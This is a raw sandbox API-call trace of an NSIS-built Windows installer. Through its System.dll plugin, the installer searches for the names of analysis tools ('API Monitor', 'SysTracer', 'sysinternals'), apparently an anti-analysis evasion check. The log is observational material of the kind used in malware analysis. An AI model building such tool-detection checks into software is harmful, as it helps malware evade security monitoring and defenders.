lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrlenA (lpString="") returned 0 [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrlenA (lpString="") returned 0 [0158.646] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.647] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.647] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.647] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.647] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.647] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.647] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.648] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.648] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.648] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrlenA (lpString="0") returned 1 [0158.648] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.649] lstrlenA (lpString="0") returned 1 [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrlenA (lpString="") returned 0 [0158.649] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrlenA (lpString="3399936") returned 7 [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrlenA (lpString="") returned 0 [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrlenA (lpString="") returned 0 [0158.650] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrlenA (lpString="") returned 0 [0158.650] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.650] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.650] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.651] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.651] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.651] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.651] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.651] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.651] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.651] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.651] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.651] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.651] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.652] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.652] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.652] lstrlenA (lpString="0") returned 1 [0158.652] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.652] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.652] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrlenA (lpString="0") returned 1 [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrlenA (lpString="") returned 0 [0158.653] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrlenA (lpString="3399936") returned 7 [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrlenA (lpString="") returned 0 [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrlenA (lpString="") returned 0 [0158.654] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrlenA (lpString="") returned 0 [0158.654] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.655] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.655] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.655] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.655] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.655] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.656] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrlenA (lpString="0") returned 1 [0158.656] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrlenA (lpString="0") returned 1 [0158.656] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.656] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.656] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.657] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.657] lstrlenA (lpString="3399936") returned 7 [0158.657] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.657] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.657] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" 